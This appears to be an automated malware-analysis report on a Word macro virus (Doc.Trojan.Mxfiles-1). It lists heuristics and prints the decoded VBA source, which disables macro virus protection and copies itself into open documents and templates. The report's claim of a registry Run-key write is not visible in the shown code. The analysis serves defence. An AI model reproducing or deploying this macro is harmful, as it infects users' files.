MALICIOUS
240
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1547.001 Registry Run Keys / Startup Folder
The sample is a malicious Office document containing a VBA macro. The macro's AutoOpen subroutine is designed to execute the Mxfiles function, which attempts to copy its own code to other open documents and potentially the user's template directory. It also attempts to write a value to the registry run key 'HKCU\Software\Microsoft\Windows\CurrentVersion\Run\IAccessible2Proxy', indicating an attempt at persistence.
Heuristics 5
-
ClamAV: Doc.Trojan.Mxfiles-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Mxfiles-1
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 8049 bytes |
SHA-256: 43db8b81e589265a4461f65ea96376d5306667c864eb94fe1cdf7850f3969130 |
|||
|
Detection
ClamAV:
Doc.Trojan.Mxfiles-1
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "Mxfile" Sub Autoexit() Mxfiles End Sub Sub Autonew() Mxfiles End Sub Sub AutoOpen() Mxfiles End Sub Sub Openshell() Mxfiles End Sub Sub Mxfiles() txt = " åÐÇ ÇáÝíÑæÓ ÚÑÖ æÛíÑ ÖÇÑ æßá ãÇíÞæã Èå ßÊÇÈå ÚÈÇÑÉ ßáäÇ äÈÇíÚ ãÈÇÑß" On Error Resume Next Application.ScreenUpdating = False Options.VirusProtection = False Options.SaveNormalPrompt = False Options.ConfirmConversions = False ddorg = ThisDocument.FullName For A = 1 To Documents.Count If Documents.Item(A).Path <> "" Then dest = Documents.Item(A).FullName SetAttr dest, vbNormal Else dest = Documents.Item(A).Name End If If ddorg <> dest Then Application.OrganizerCopy Source:=ddorg, Destination:=dest, Name:="Mxfile", Object:=wdOrganizerObjectProjectItems If Documents.Item(A).Path <> "" Then Documents.Item(A).Save End If End If dd = Documents.Item(A).AttachedTemplate dd1 = Options.DefaultFilePath(Path:=wdUserTemplatesPath) dd2 = dd1 + "\" + dd SetAttr dd2, vbNormal If ddorg <> dd2 Then Application.OrganizerCopy Source:=ddorg, Destination:=dd2, Name:="Mxfile", Object:=wdOrganizerObjectProjectItems End If Next A ff$ = GetSetting(appname:="network", Section:="unix", Key:="mxfile") If Val(ff$) = 255 Then Application.ScreenUpdating = True Exit Sub End If dayn = Format(Date, "dd") Monthn = Format(Date, "mm") reg = dayn Mod Monthn If reg = 0 And dayn > 10 Then If ActiveWindow.ActivePane.View.Type <> wdPageView Then View = ActiveWindow.ActivePane.View.Type ActiveWindow.ActivePane.View.Type = wdPageView End If ActiveWindow.ActivePane.View.SeekView = wdSeekCurrentPageHeader Selection.EndKey Unit:=wdLine, Extend:=wdExtend Selection.ParagraphFormat.Alignment = wdAlignParagraphCenter Selection.TypeText Text:=right(txt, 16) ActiveWindow.ActivePane.View.SeekView = wdSeekCurrentPageFooter Selection.EndKey Unit:=wdLine, Extend:=wdExtend Selection.ParagraphFormat.Alignment = wdAlignParagraphCenter Selection.TypeText Text:=right(txt, 16) ActiveWindow.ActivePane.View.SeekView = wdSeekMainDocument ActiveWindow.ActivePane.View.Type = View End If Application.ScreenUpdating = True End Sub ' Processing file: /opt/analyzer/scan_staging/dd99018e38364260a582f57e8e12d853.bin ' =============================================================================== ' Module streams: ' Macros/VBA/ThisDocument - 903 bytes ' Macros/VBA/Mxfile - 4133 bytes ' Line #0: ' FuncDefn (Sub Autoexit()) ' Line #1: ' ArgsCall Mxfiles 0x0000 ' Line #2: ' EndSub ' Line #3: ' FuncDefn (Sub Autonew()) ' Line #4: ' ArgsCall Mxfiles 0x0000 ' Line #5: ' EndSub ' Line #6: ' FuncDefn (Sub AutoOpen()) ' Line #7: ' ArgsCall Mxfiles 0x0000 ' Line #8: ' EndSub ' Line #9: ' FuncDefn (Sub Openshell()) ' Line #10: ' ArgsCall Mxfiles 0x0000 ' Line #11: ' EndSub ' Line #12: ' Line #13: ' FuncDefn (Sub Mxfiles()) ' Line #14: ' LitStr 0x0044 " åÐÇ ÇáÝíÑæÓ ÚÑÖ æÛíÑ ÖÇÑ æßá ãÇíÞæã Èå ßÊÇÈå ÚÈÇÑÉ ßáäÇ äÈÇíÚ ãÈÇÑß" ' St txt ' Line #15: ' OnError (Resume Next) ' Line #16: ' LitVarSpecial (False) ' Ld Application ' MemSt ScreenUpdating ' Line #17: ' LitVarSpecial (False) ' Ld Options ' MemSt VirusProtection ' Line #18: ' LitVarSpecial (False) ' Ld Options ' MemSt SaveNormalPrompt ' Line #19: ' LitVarSpecial (False) ' Ld Options ' MemSt ConfirmConversions ' Line #20: ' Ld ThisDocument ' MemLd FullName ' St ddorg ' Line #21: ' StartForVariable ' Ld A ' EndForVariable ' LitDI2 0x0001 ' Ld Documents ' MemLd Count ' For ' Line #22: ' Ld A ' Ld Documents ' ArgsMemLd Item 0x0001 ' MemLd Path ' LitStr 0x0000 "" ' Ne ' IfBlock ' Line #23: ' Ld A ' Ld Documents ' ArgsMemLd Item 0x0001 ' MemLd FullName ' St dest ' Line #24: ' Ld dest ' Ld vbNormal ' ArgsCall SetAttr 0x0002 ' Line #25: ' ElseBlock ' Line #26: ' Ld A ... (truncated) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.